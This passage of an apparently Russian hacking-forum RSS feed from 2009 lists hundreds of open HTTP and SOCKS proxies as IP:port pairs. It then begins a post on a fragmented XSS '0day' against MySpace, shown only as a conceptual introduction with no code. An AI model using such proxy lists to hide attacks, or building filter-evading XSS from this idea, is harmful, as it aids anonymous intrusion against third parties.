/&gt;212.219.86.150:80&lt;br /&gt;62.129.243.66:80&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;200.208.90.194:3128&lt;br /&gt;121.22.29.183:80&lt;br /&gt;221.239.127.205:3128&lt;br /&gt;193.252.45.218:3128&lt;br /&gt;218.62.91.211:8080&lt;br /&gt;62.240.183.82:8080&lt;br /&gt;62.38.217.244:3128&lt;br /&gt;121.22.29.181:80&lt;br /&gt;195.159.135.38:80&lt;br /&gt;213.81.172.254:3128&lt;br /&gt;59.120.142.229:3128&lt;br /&gt;91.121.107.117:3128&lt;br /&gt;190.65.211.154:8080&lt;br /&gt;200.207.89.21:3128&lt;br /&gt;59.126.110.155:3128&lt;br /&gt;189.19.229.15:3128&lt;br /&gt;119.70.40.101:8080&lt;br /&gt;140.130.192.2:3128&lt;br /&gt;60.251.132.43:3128&lt;br /&gt;91.142.12.174:8080&lt;br /&gt;211.95.176.6:808&lt;br /&gt;60.217.68.150:8080&lt;br /&gt;77.108.40.194:8080&lt;br /&gt;212.100.64.41:3128&lt;br /&gt;221.130.193.14:80&lt;br /&gt;221.130.193.14:80&lt;br /&gt;124.106.77.46:3128&lt;br /&gt;218.17.246.197:3128&lt;br /&gt;189.56.150.110:8080&lt;br /&gt;201.65.163.131:80&lt;br /&gt;201.39.183.172:3128&lt;br /&gt;218.97.194.94:80&lt;br /&gt;121.22.29.182:80&lt;br /&gt;122.224.222.134:3128&lt;br /&gt;121.22.29.180:80&lt;br /&gt;67.78.144.22:80&lt;br /&gt;195.101.116.12:80&lt;br /&gt;64.66.192.62:80&lt;br /&gt;64.66.192.62:80&lt;br /&gt;222.134.58.246:3128&lt;br /&gt;218.94.9.38:8080&lt;br /&gt;64.66.192.61:32080&lt;br /&gt;124.30.18.245:3128&lt;br /&gt;66.198.41.11:3128&lt;br /&gt;220.194.221.29:3128&lt;br /&gt;125.162.90.26:3128&lt;br /&gt;193.173.119.83:8080&lt;br /&gt;140.127.81.85:80&lt;br /&gt;218.240.35.59:3128&lt;br /&gt;200.158.140.107:3128&lt;br /&gt;67.69.254.253:80&lt;br /&gt;200.221.10.104:80&lt;br /&gt;221.224.53.83:3128&lt;br /&gt;66.155.118.55:80&lt;br /&gt;200.207.90.137:3128&lt;br /&gt;200.119.240.115:3128&lt;br /&gt;189.29.91.168:3128&lt;br /&gt;94.74.137.4:80&lt;br /&gt;203.162.183.222:80&lt;br /&gt;203.160.1.130:554&lt;br /&gt;203.160.1.130:554&lt;br /&gt;60.251.221.98:3128&lt;br /&gt;203.109.123.233:80&lt;br /&gt;79.99.129.51:80&lt;br /&gt;118.137.223.66:8080&lt;br /&gt;116.199.202.95:8080&lt;br /&gt;200.186.35.38:8080&lt;br /&gt;209.112.224.45:8080&lt;br /&gt;213.136.8.87:3128&lt;br /&gt;196.213.163.58:8080&lt;br /&gt;89.142.197.212:8088&lt;br /&gt;190.12.49.230:3128&lt;br /&gt;74.53.91.58:8080&lt;br /&gt;119.31.250.73:8080&lt;br /&gt;189.12.128.18:8080&lt;br /&gt;210.17.228.189:8088&lt;br /&gt;210.17.228.191:8088&lt;br /&gt;189.124.152.141:8080&lt;br /&gt;201.67.198.2:3128&lt;br /&gt;124.157.241.43:8000&lt;br /&gt;91.121.112.151:3128&lt;br /&gt;125.241.234.3:8080&lt;br /&gt;80.90.82.92:80&lt;br /&gt;116.11.32.210:8080&lt;br /&gt;212.56.203.196:3128&lt;br /&gt;213.79.43.142:3128&lt;br /&gt;202.93.141.14:8080&lt;br /&gt;210.17.228.190:8088&lt;br /&gt;220.90.215.13:8080&lt;br /&gt;125.240.55.130:8080&lt;br /&gt;189.166.72.129:80&lt;br /&gt;190.161.145.82:3128&lt;br /&gt;189.21.159.5:3128&lt;br /&gt;189.19.3.166:3128&lt;br /&gt;189.1.4.200:80&lt;br /&gt;70.167.178.180:8080&lt;br /&gt;202.88.253.138:8080&lt;br /&gt;122.116.45.17:80&lt;br /&gt;203.104.252.222:80&lt;br /&gt;61.135.130.101:8080&lt;br /&gt;117.102.53.105:3128&lt;br /&gt;91.121.0.205:3128&lt;br /&gt;59.49.12.57:8080&lt;br /&gt;200.96.12.195:80&lt;br /&gt;195.144.24.27:80&lt;br /&gt;59.56.174.199:808&lt;br /&gt;174.129.113.87:3128&lt;br /&gt;89.144.96.79:808&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:15:39 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=52#p52</guid>
		</item>
		<item>
			<title>HTTP</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=51#p51</link>
			<description>&lt;p&gt;12.41.224.194:80&lt;br /&gt;12.41.224.227:80&lt;br /&gt;128.183.240.13:80&lt;br /&gt;128.59.20.226:3127&lt;br /&gt;130.133.1.4:80&lt;br /&gt;189.37.28.147:6588&lt;br /&gt;193.109.238.74:80&lt;br /&gt;193.45.143.12:80&lt;br /&gt;193.45.143.41:80&lt;br /&gt;194.176.176.82:8080&lt;br /&gt;194.36.10.156:3128&lt;br /&gt;195.130.121.205:3128&lt;br /&gt;195.208.252.130:80&lt;br /&gt;201.17.6.199:3128&lt;br /&gt;203.160.1.75:80&lt;br /&gt;203.160.1.94:80&lt;br /&gt;203.178.133.2:3127&lt;br /&gt;205.234.185.2:80&lt;br /&gt;207.126.123.14:80&lt;br /&gt;207.126.123.31:80&lt;br /&gt;207.176.148.38:80&lt;br /&gt;207.241.148.125:80&lt;br /&gt;207.241.148.83:80&lt;br /&gt;207.241.149.48:80&lt;br /&gt;207.58.130.125:80&lt;br /&gt;207.58.130.126:80&lt;br /&gt;207.58.130.127:80&lt;br /&gt;207.58.135.116:80&lt;br /&gt;208.106.250.202:80&lt;br /&gt;208.185.127.41:80&lt;br /&gt;208.185.127.46:80&lt;br /&gt;208.45.143.104:80&lt;br /&gt;208.45.143.105:80&lt;br /&gt;209.151.80.90:80&lt;br /&gt;209.163.108.80:80&lt;br /&gt;209.197.78.141:80&lt;br /&gt;209.200.46.108:80&lt;br /&gt;209.211.252.52:80&lt;br /&gt;209.235.218.83:80&lt;br /&gt;209.34.241.44:80&lt;br /&gt;209.63.57.11:80&lt;br /&gt;211.95.176.6:808&lt;br /&gt;216.128.15.7:80&lt;br /&gt;216.131.76.165:80&lt;br /&gt;216.27.89.10:80&lt;br /&gt;216.28.47.243:80&lt;br /&gt;216.88.180.29:80&lt;br /&gt;216.92.100.102:80&lt;br /&gt;216.92.167.126:80&lt;br /&gt;216.92.235.47:80&lt;br /&gt;218.103.71.153:80&lt;br /&gt;222.215.152.139:8080&lt;br /&gt;60.2.93.11:80&lt;br /&gt;61.139.73.6:8080&lt;br /&gt;62.116.161.244:80&lt;br /&gt;64.156.27.80:80&lt;br /&gt;64.156.27.81:80&lt;br /&gt;64.156.27.82:80&lt;br /&gt;64.157.13.111:80&lt;br /&gt;64.157.13.112:80&lt;br /&gt;64.157.13.114:80&lt;br /&gt;64.159.90.41:80&lt;br /&gt;64.159.90.42:80&lt;br /&gt;64.159.90.43:80&lt;br /&gt;64.159.90.45:80&lt;br /&gt;64.16.20.22:443&lt;br /&gt;64.27.21.167:80&lt;br /&gt;64.34.121.216:80&lt;br /&gt;64.91.240.24:80&lt;br /&gt;65.101.56.26:443&lt;br /&gt;65.166.186.180:443&lt;br /&gt;65.199.160.6:80&lt;br /&gt;65.243.68.184:80&lt;br /&gt;66.119.43.31:80&lt;br /&gt;66.119.43.36:80&lt;br /&gt;66.119.43.37:80&lt;br /&gt;66.160.167.68:80&lt;br /&gt;66.198.41.11:3128&lt;br /&gt;66.221.9.170:80&lt;br /&gt;66.225.212.182:80&lt;br /&gt;66.230.212.200:80&lt;br /&gt;66.230.212.202:80&lt;br /&gt;66.230.212.203:80&lt;br /&gt;66.230.212.206:80&lt;br /&gt;66.230.212.207:80&lt;br /&gt;66.230.212.208:80&lt;br /&gt;66.39.5.184:80&lt;br /&gt;66.77.122.132:80&lt;br /&gt;66.77.122.135:80&lt;br /&gt;67.15.104.28:80&lt;br /&gt;67.19.193.229:80&lt;br /&gt;69.90.107.184:80&lt;br /&gt;70.47.58.52:80&lt;br /&gt;70.85.217.109:80&lt;br /&gt;72.249.149.144:80&lt;br /&gt;72.32.134.146:80&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;74.54.156.73:80&lt;br /&gt;81.187.203.152:80&lt;br /&gt;81.187.203.182:80&lt;br /&gt;85.116.9.34:80&lt;br /&gt;planet1.l3s.uni-hannover.de:3124&lt;br /&gt;planet2.colbud.hu:3124&lt;br /&gt;planetlab1.cs.uiuc.edu:3127&lt;br /&gt;planetlab-1.usask.ca:3128&lt;br /&gt;planetlab2.cesnet.cz:3127&lt;br /&gt;planetlab2.informatik.uni-erlangen.de:3124&lt;br /&gt;planetlab4.cs.duke.edu:3128&lt;br /&gt;planetx.scs.cs.nyu.edu:3128&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:14:51 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=51#p51</guid>
		</item>
		<item>
			<title>HTTP чеканные</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=50#p50</link>
			<description>&lt;p&gt;60.2.93.11:80&lt;br /&gt;58.22.101.251:80&lt;br /&gt;12.47.164.114:8888&lt;br /&gt;213.134.144.134:8080&lt;br /&gt;202.168.193.131:80&lt;br /&gt;200.140.78.67:3128&lt;br /&gt;203.73.180.16:3128&lt;br /&gt;201.229.208.2:80&lt;br /&gt;222.184.56.3:80&lt;br /&gt;200.62.136.138:3128&lt;br /&gt;200.41.60.135:3128&lt;br /&gt;189.11.171.26:3128&lt;br /&gt;202.57.163.72:3128&lt;br /&gt;210.86.181.202:80&lt;br /&gt;201.229.208.002:80&lt;br /&gt;201.229.208.002:80&lt;br /&gt;122.224.97.85:3128&lt;br /&gt;61.220.102.102:3128&lt;br /&gt;60.6.205.20:808&lt;br /&gt;222.223.127.130:808&lt;br /&gt;203.149.32.30:8080&lt;br /&gt;60.217.80.36:8080&lt;br /&gt;202.151.177.175:3128&lt;br /&gt;218.75.100.114:8080&lt;br /&gt;201.229.208.3:80&lt;br /&gt;59.120.77.147:3128&lt;br /&gt;61.139.73.6:8080&lt;br /&gt;194.226.118.18:3128&lt;br /&gt;123.255.250.5:3128&lt;br /&gt;122.224.171.91:3128&lt;br /&gt;201.229.208.003:80&lt;br /&gt;120.28.64.69:8080&lt;br /&gt;218.14.227.197:3128&lt;br /&gt;203.151.233.143:80&lt;br /&gt;201.86.70.190:3128&lt;br /&gt;201.86.70.190:3128&lt;br /&gt;119.147.23.118:8080&lt;br /&gt;201.229.208.2:80&lt;br /&gt;213.171.255.2:8080&lt;br /&gt;201.30.141.82:3128&lt;br /&gt;201.229.208.003:80&lt;br /&gt;203.160.1.121:80&lt;br /&gt;203.160.1.66:80&lt;br /&gt;203.160.1.94:80&lt;br /&gt;203.160.1.103:80&lt;br /&gt;203.160.1.112:80&lt;br /&gt;203.160.1.75:80&lt;br /&gt;203.160.1.85:80&lt;br /&gt;58.222.254.13:3128&lt;br /&gt;200.94.106.76:8080&lt;br /&gt;121.207.252.139:80&lt;br /&gt;59.18.13.75:80&lt;br /&gt;201.65.121.102:3128&lt;br /&gt;200.19.221.136:443&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;82.204.37.210:80&lt;br /&gt;82.204.37.210:80&lt;br /&gt;220.130.10.171:3128&lt;br /&gt;220.135.212.133:3128&lt;br /&gt;80.88.242.32:9090&lt;br /&gt;212.191.130.227:8080&lt;br /&gt;77.240.82.6:80&lt;br /&gt;213.4.106.164:8080&lt;br /&gt;61.133.196.36:80&lt;br /&gt;60.191.96.90:808&lt;br /&gt;219.93.178.162:3128&lt;br /&gt;219.93.178.162:3128&lt;br /&gt;86.51.34.35:8080&lt;br /&gt;150.165.255.74:3128&lt;br /&gt;167.206.55.215:80&lt;br /&gt;216.129.228.87:8080&lt;br /&gt;204.194.251.15:80&lt;br /&gt;61.133.196.40:80&lt;br /&gt;120.28.64.86:8080&lt;br /&gt;189.74.11.18:8080&lt;br /&gt;211.68.112.69:3128&lt;br /&gt;202.57.48.195:3128&lt;br /&gt;213.23.77.146:80&lt;br /&gt;125.163.84.140:8080&lt;br /&gt;218.94.9.38:3128&lt;br /&gt;125.245.196.194:8080&lt;br /&gt;209.17.190.136:3128&lt;br /&gt;210.82.31.151:80&lt;br /&gt;60.12.190.108:8088&lt;br /&gt;87.236.195.86:3128&lt;br /&gt;212.93.193.82:443&lt;br /&gt;212.93.193.78:443&lt;br /&gt;212.93.193.74:443&lt;br /&gt;212.93.193.83:443&lt;br /&gt;212.93.193.72:443&lt;br /&gt;212.219.86.150:80&lt;br /&gt;62.129.243.66:80&lt;br /&gt;64.22.118.170:81&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;61.7.143.5:3128&lt;br /&gt;189.59.4.138:3128&lt;br /&gt;200.19.221.136:443&lt;br /&gt;200.208.90.194:3128&lt;br /&gt;82.115.28.134:8080&lt;br /&gt;207.35.173.123:3128&lt;br /&gt;121.22.29.183:80&lt;br /&gt;221.239.127.205:3128&lt;br /&gt;201.12.130.34:3128&lt;br /&gt;218.62.91.211:8080&lt;br /&gt;218.28.58.86:3128&lt;br /&gt;201.133.171.213:8080&lt;br /&gt;62.240.183.82:8080&lt;br /&gt;118.98.184.140:8080&lt;br /&gt;121.22.29.181:80&lt;br /&gt;213.81.172.254:3128&lt;br /&gt;59.120.142.229:3128&lt;br /&gt;91.121.107.117:3128&lt;br /&gt;195.57.124.85:80&lt;br /&gt;77.48.103.12:8080&lt;br /&gt;196.5.66.11:80&lt;br /&gt;80.216.132.94:3128&lt;br /&gt;190.65.211.154:8080&lt;br /&gt;200.198.82.211:3128&lt;br /&gt;200.207.89.21:3128&lt;br /&gt;60.218.99.18:8080&lt;br /&gt;86.51.34.33:8080&lt;br /&gt;86.51.34.34:8080&lt;br /&gt;59.126.110.155:3128&lt;br /&gt;222.88.242.189:3128&lt;br /&gt;189.19.229.15:3128&lt;br /&gt;119.70.40.101:8080&lt;br /&gt;140.130.192.2:3128&lt;br /&gt;92.62.113.33:80&lt;br /&gt;221.179.215.169:3128&lt;br /&gt;60.251.132.43:3128&lt;br /&gt;91.142.12.174:8080&lt;br /&gt;91.142.12.62:8080&lt;br /&gt;189.57.63.7:3128&lt;br /&gt;208.77.219.76:80&lt;br /&gt;211.95.176.6:808&lt;br /&gt;203.158.167.152:8080&lt;br /&gt;60.217.68.150:8080&lt;br /&gt;77.108.40.194:8080&lt;br /&gt;212.100.64.41:3128&lt;br /&gt;221.130.193.14:80&lt;br /&gt;221.130.193.14:80&lt;br /&gt;202.71.103.109:3128&lt;br /&gt;93.100.16.90:8080&lt;br /&gt;221.12.165.186:808&lt;br /&gt;210.51.191.4:3128&lt;br /&gt;200.110.172.59:3128&lt;br /&gt;124.106.77.46:3128&lt;br /&gt;213.163.42.138:8080&lt;br /&gt;189.56.150.110:8080&lt;br /&gt;201.65.163.131:80&lt;br /&gt;201.39.183.172:3128&lt;br /&gt;201.75.35.128:3128&lt;br /&gt;201.68.28.14:80&lt;br /&gt;218.97.194.94:80&lt;br /&gt;121.22.29.182:80&lt;br /&gt;122.224.222.134:3128&lt;br /&gt;80.126.22.246:80&lt;br /&gt;121.22.29.180:80&lt;br /&gt;190.216.198.123:8080&lt;br /&gt;59.120.164.148:80&lt;br /&gt;61.247.19.174:8080&lt;br /&gt;195.101.116.12:80&lt;br /&gt;64.66.192.62:80&lt;br /&gt;87.237.228.18:8080&lt;br /&gt;221.203.154.26:8080&lt;br /&gt;64.66.192.62:80&lt;br /&gt;219.134.242.204:3128&lt;br /&gt;196.211.241.2:3128&lt;br /&gt;222.134.58.246:3128&lt;br /&gt;87.204.241.75:8080&lt;br /&gt;218.94.9.38:3128&lt;br /&gt;64.66.192.61:32080&lt;br /&gt;124.30.18.245:3128&lt;br /&gt;66.198.41.11:3128&lt;br /&gt;209.169.132.34:8080&lt;br /&gt;63.162.106.70:80&lt;br /&gt;58.211.186.250:3128&lt;br /&gt;59.18.13.76:80&lt;br /&gt;59.18.13.77:80&lt;br /&gt;59.18.13.78:80&lt;br /&gt;59.18.13.72:80&lt;br /&gt;59.18.13.73:80&lt;br /&gt;59.18.13.74:80&lt;br /&gt;59.18.13.71:80&lt;br /&gt;220.225.28.138:3128&lt;br /&gt;91.202.69.248:80&lt;br /&gt;125.162.90.26:3128&lt;br /&gt;220.227.47.6:8080&lt;br /&gt;140.127.81.85:80&lt;br /&gt;78.38.114.36:80&lt;br /&gt;200.158.140.107:3128&lt;br /&gt;81.114.86.130:3128&lt;br /&gt;91.103.121.18:8080&lt;br /&gt;202.99.29.27:80&lt;br /&gt;121.242.41.67:3128&lt;br /&gt;201.24.133.51:3128&lt;br /&gt;200.207.90.137:3128&lt;br /&gt;200.119.240.115:3128&lt;br /&gt;125.160.61.201:3128&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:14:13 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=50#p50</guid>
		</item>
		<item>
			<title>чеканые HTTP</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=49#p49</link>
			<description>&lt;p&gt;120.28.64.69:8080&lt;br /&gt;120.28.64.86:8080&lt;br /&gt;121.207.252.139:80&lt;br /&gt;121.22.29.180:80&lt;br /&gt;121.22.29.181:80&lt;br /&gt;121.22.29.182:80&lt;br /&gt;121.22.29.183:80&lt;br /&gt;121.242.41.67:3128&lt;br /&gt;122.224.97.85:3128&lt;br /&gt;139.91.200.198:8080&lt;br /&gt;142.33.100.41:8080&lt;br /&gt;201.229.208.2:80&lt;br /&gt;201.229.208.3:80&lt;br /&gt;202.194.13.157:3128&lt;br /&gt;203.160.1.103:80&lt;br /&gt;203.160.1.112:80&lt;br /&gt;203.160.1.162:554&lt;br /&gt;203.160.1.66:80&lt;br /&gt;203.160.1.75:80&lt;br /&gt;203.160.1.85:80&lt;br /&gt;210.52.15.210:808&lt;br /&gt;212.93.193.74:443&lt;br /&gt;212.93.193.78:443&lt;br /&gt;212.93.193.82:443&lt;br /&gt;212.93.193.83:443&lt;br /&gt;218.241.141.37:8080&lt;br /&gt;218.28.58.86:3128&lt;br /&gt;218.75.100.114:8080&lt;br /&gt;219.101.35.83:3128&lt;br /&gt;219.142.121.37:80&lt;br /&gt;221.239.127.205:3128&lt;br /&gt;222.134.58.246:3128&lt;br /&gt;222.184.56.3:80&lt;br /&gt;58.22.101.251:80&lt;br /&gt;59.56.174.199:808&lt;br /&gt;60.2.93.11:80&lt;br /&gt;60.217.80.36:8080&lt;br /&gt;60.28.252.206:3128&lt;br /&gt;61.133.196.36:80&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;77.240.82.6:80&lt;br /&gt;83.137.26.25:8080&lt;br /&gt;86.51.34.35:8080&lt;br /&gt;134.2.172.252:3124&lt;br /&gt;194.36.10.154:3128&lt;br /&gt;203.178.133.3:3128&lt;br /&gt;120.28.64.69:8080&lt;br /&gt;207.157.9.179:9090&lt;br /&gt;201.229.208.3:80&lt;br /&gt;89.189.85.102:80&lt;br /&gt;120.28.64.86:8080&lt;br /&gt;67.19.148.234:3128&lt;br /&gt;201.229.208.2:80&lt;br /&gt;146.57.249.98:3127&lt;br /&gt;140.112.42.159:3127&lt;br /&gt;86.51.34.34:8080&lt;br /&gt;167.206.55.215:80&lt;br /&gt;86.51.34.33:8080&lt;br /&gt;92.62.113.33:80&lt;br /&gt;138.232.66.194:3124&lt;br /&gt;138.232.66.195:3124&lt;br /&gt;142.150.238.12:3128&lt;br /&gt;142.150.238.13:3124&lt;br /&gt;72.55.191.6:3128&lt;br /&gt;128.233.252.12:3124&lt;br /&gt;128.233.252.11:3127&lt;br /&gt;198.163.152.229:3124&lt;br /&gt;194.42.17.124:3128&lt;br /&gt;194.42.17.123:3124&lt;br /&gt;195.113.161.82:3128&lt;br /&gt;195.113.161.83:3127&lt;br /&gt;193.167.182.132:3128&lt;br /&gt;193.167.182.130:3127&lt;br /&gt;193.167.187.188:3128&lt;br /&gt;193.55.112.41:3128&lt;br /&gt;138.246.99.250:3124&lt;br /&gt;132.187.230.2:3128&lt;br /&gt;141.76.45.18:3127&lt;br /&gt;141.76.45.17:3128&lt;br /&gt;137.226.138.154:3128&lt;br /&gt;137.226.138.156:3128&lt;br /&gt;134.34.246.4:3124&lt;br /&gt;134.2.172.253:3127&lt;br /&gt;141.24.33.192:3128&lt;br /&gt;131.246.191.42:3124&lt;br /&gt;138.246.99.249:3128&lt;br /&gt;130.75.87.84:3124&lt;br /&gt;130.75.87.83:3124&lt;br /&gt;132.252.152.194:3127&lt;br /&gt;131.188.44.101:3127&lt;br /&gt;132.187.230.1:3124&lt;br /&gt;141.24.33.162:3128&lt;br /&gt;147.102.3.101:3128&lt;br /&gt;193.6.20.4:3128&lt;br /&gt;193.6.20.5:3128&lt;br /&gt;130.136.254.21:3127&lt;br /&gt;131.175.17.10:3128&lt;br /&gt;130.136.254.22:3127&lt;br /&gt;131.175.17.9:3128&lt;br /&gt;130.192.157.132:3128&lt;br /&gt;130.192.157.131:3128&lt;br /&gt;133.11.240.56:3128&lt;br /&gt;133.1.16.172:3128&lt;br /&gt;203.178.133.11:3127&lt;br /&gt;150.65.32.68:3128&lt;br /&gt;133.11.240.57:3124&lt;br /&gt;133.1.16.171:3124&lt;br /&gt;143.248.139.56:3124&lt;br /&gt;143.248.139.171:3124&lt;br /&gt;205.138.18.80:8080&lt;br /&gt;80.216.132.94:3128&lt;br /&gt;195.144.24.27:80&lt;br /&gt;77.42.159.251:80&lt;br /&gt;203.160.1.94:80&lt;br /&gt;203.160.1.85:80&lt;br /&gt;203.160.1.112:80&lt;br /&gt;203.160.1.121:80&lt;br /&gt;81.95.178.70:3128&lt;br /&gt;91.74.59.98:3128&lt;br /&gt;189.21.136.84:3128&lt;br /&gt;222.255.28.33:3128&lt;br /&gt;124.30.18.245:3128&lt;br /&gt;200.119.240.115:3128&lt;br /&gt;203.160.1.103:80&lt;br /&gt;196.5.66.11:80&lt;br /&gt;187.11.192.247:3128&lt;br /&gt;213.67.163.24:80&lt;br /&gt;201.27.85.32:3128&lt;br /&gt;189.56.150.110:8080&lt;br /&gt;62.240.183.82:8080&lt;br /&gt;62.129.243.66:80&lt;br /&gt;91.121.107.117:3128&lt;br /&gt;213.81.172.254:3128&lt;br /&gt;203.158.167.152:8080&lt;br /&gt;189.59.4.138:3128&lt;br /&gt;200.198.82.211:3128&lt;br /&gt;94.52.80.125:3128&lt;br /&gt;213.128.216.241:3128&lt;br /&gt;87.248.168.73:9090&lt;br /&gt;209.239.114.14:3128&lt;br /&gt;200.214.61.210:80&lt;br /&gt;212.56.203.196:3128&lt;br /&gt;189.2.157.162:3128&lt;br /&gt;220.111.137.188:8080&lt;br /&gt;121.246.161.191:8080&lt;br /&gt;92.46.175.10:3128&lt;br /&gt;130.37.198.244:3128&lt;br /&gt;195.116.60.34:3124&lt;br /&gt;194.29.178.13:3124&lt;br /&gt;156.17.10.52:3128&lt;br /&gt;194.29.178.14:3128&lt;br /&gt;193.136.191.26:3127&lt;br /&gt;136.145.115.196:3128&lt;br /&gt;136.145.115.194:3128&lt;br /&gt;192.33.90.68:3128&lt;br /&gt;192.33.90.66:3128&lt;br /&gt;192.33.210.16:3128&lt;br /&gt;192.41.135.219:3128&lt;br /&gt;192.33.210.17:3128&lt;br /&gt;130.92.70.251:3128&lt;br /&gt;192.33.90.69:3127&lt;br /&gt;192.42.43.22:3128&lt;br /&gt;140.109.17.180:3128&lt;br /&gt;134.151.255.180:3128&lt;br /&gt;130.88.203.27:3124&lt;br /&gt;128.112.139.80:3127&lt;br /&gt;169.229.50.7:3128&lt;br /&gt;203.160.1.75:80&lt;br /&gt;68.105.2.18:9090&lt;br /&gt;203.160.1.66:80&lt;br /&gt;121.22.29.181:80&lt;br /&gt;60.2.93.11:80&lt;br /&gt;58.22.101.251:80&lt;br /&gt;121.22.29.180:80&lt;br /&gt;121.22.29.182:80&lt;br /&gt;218.5.18.131:3128&lt;br /&gt;122.224.97.85:3128&lt;br /&gt;220.225.28.138:3128&lt;br /&gt;218.14.227.197:3128&lt;br /&gt;222.134.58.246:3128&lt;br /&gt;61.143.101.38:8000&lt;br /&gt;119.147.23.118:8080&lt;br /&gt;60.217.80.36:8080&lt;br /&gt;87.120.57.8:8080&lt;br /&gt;59.56.174.199:808&lt;br /&gt;128.252.19.21:3127&lt;br /&gt;193.167.182.132:3127&lt;br /&gt;193.167.182.130:3124&lt;br /&gt;128.232.103.201:3124&lt;br /&gt;74.193.177.25:65442&lt;br /&gt;201.45.223.3:6588&lt;br /&gt;138.238.250.155:3124&lt;br /&gt;66.253.186.239:9090&lt;br /&gt;165.230.49.114:3128&lt;br /&gt;128.238.88.64:3128&lt;br /&gt;193.55.112.41:3124&lt;br /&gt;134.2.172.252:3127&lt;br /&gt;193.55.112.41:3127&lt;br /&gt;60.6.205.20:808&lt;br /&gt;221.11.27.110:8080&lt;br /&gt;60.251.9.73:3128&lt;br /&gt;118.98.169.18:3128&lt;br /&gt;91.103.121.70:8080&lt;br /&gt;213.136.8.87:3128&lt;br /&gt;85.15.216.65:8080&lt;br /&gt;124.30.203.4:3128&lt;br /&gt;61.7.219.213:8080&lt;br /&gt;201.30.141.82:3128&lt;br /&gt;211.68.112.69:3128&lt;br /&gt;61.16.247.37:3128&lt;br /&gt;220.90.215.13:8080&lt;br /&gt;129.24.211.26:3128&lt;br /&gt;194.36.10.154:3124&lt;br /&gt;194.36.10.154:3127&lt;br /&gt;194.36.10.156:3124&lt;br /&gt;198.163.152.229:3127&lt;br /&gt;198.163.152.229:3128&lt;br /&gt;61.133.196.36:80&lt;br /&gt;133.11.240.56:3124&lt;br /&gt;133.11.240.57:3127&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:13:01 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=49#p49</guid>
		</item>
		<item>
			<title>Good HTTP proxies:</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=47#p47</link>
			<description>&lt;p&gt;88.191.14.132:3128 &lt;br /&gt;201.82.226.107:3128 &lt;br /&gt;148.233.159.57:80 &lt;br /&gt;203.158.221.226:443 &lt;br /&gt;216.139.170.42:80 &lt;br /&gt;24.155.96.93:80 &lt;br /&gt;121.241.33.149:3128 &lt;br /&gt;189.112.176.33:3128 &lt;br /&gt;221.132.112.94:80 &lt;br /&gt;200.91.228.178:8080 &lt;br /&gt;200.51.41.29:8080 &lt;br /&gt;202.75.20.218:80 &lt;br /&gt;221.132.112.114:8080 &lt;br /&gt;195.90.171.94:80 &lt;br /&gt;200.223.166.246:8080 &lt;br /&gt;202.77.98.19:8080 &lt;br /&gt;200.142.126.126:80 &lt;br /&gt;221.132.112.94:80 &lt;br /&gt;58.242.42.91:3128 &lt;br /&gt;58.242.42.91:3128 &lt;br /&gt;216.139.170.55:80 &lt;br /&gt;216.139.170.42:80 &lt;br /&gt;60.254.188.10:80 &lt;br /&gt;213.134.144.134:8080 &lt;br /&gt;67.69.254.250:80 &lt;br /&gt;66.198.41.11:3128 &lt;br /&gt;213.134.144.134:8080 &lt;br /&gt;66.198.41.11:3128 &lt;br /&gt;85.185.186.83:80 &lt;br /&gt;67.69.254.250:80 &lt;/p&gt;
						&lt;p&gt;Good Socks 4 proxies: &lt;br /&gt;61.139.67.177:1080 &lt;br /&gt;82.235.70.243:30433 &lt;br /&gt;71.193.22.17:58987 &lt;br /&gt;71.237.178.4:60029 &lt;br /&gt;67.80.211.82:3103 &lt;br /&gt;66.31.114.247:23624 &lt;/p&gt;
						&lt;p&gt;Good Socks 5 proxies: &lt;br /&gt;82.235.70.243:30433 &lt;br /&gt;71.193.22.17:58987 &lt;br /&gt;70.231.248.61:19101 &lt;br /&gt;75.59.148.139:42655 &lt;br /&gt;76.116.155.73:12823&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Sat, 20 Jun 2009 02:11:45 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=47#p47</guid>
		</item>
		<item>
			<title>Фото</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=44#p44</link>
			<description>&lt;p&gt;&lt;a href=&quot;http://ifotki.info/&quot; rel=&quot;nofollow&quot; target=&quot;_blank&quot;&gt;http://ifotki.info/&lt;/a&gt;&amp;#160; &amp;#160; Бесплатный хочтинг фотографий, для форумов, гстевых книг....&lt;/p&gt;</description>
			<author>mybb@mybb.ru (Stemp-Admin)</author>
			<pubDate>Fri, 19 Jun 2009 03:10:41 +0400</pubDate>
			<guid>http://xakforum.mybb.forum/viewtopic.php?pid=44#p44</guid>
		</item>
		<item>
			<title>Фрагментированное XSS нападение: MySpace 0day эксплоит</title>
			<link>http://xakforum.mybb.forum/viewtopic.php?pid=25#p25</link>
			<description>&lt;p&gt;Введение&lt;/p&gt;
						&lt;p&gt;&amp;#160; &amp;#160; На простом уровне объяснение фрагментированной атаки довольно просто - несколько фрагментов, самих по себе безопасных и способных пройти фильтры или файрволы, при достижении цели собираются в единое целое, которое уже несет в себе угрозу. Фрагментированные атаки обычно применяются на сетевом/сессионном уровне - для обхода систем обнаружения вторжения и файрволов, однако могут применяться и для более простых нападений, например межсайтового скриптинга, в документах которые собираются из частей и предоставляются пользователю.&lt;/p&gt;
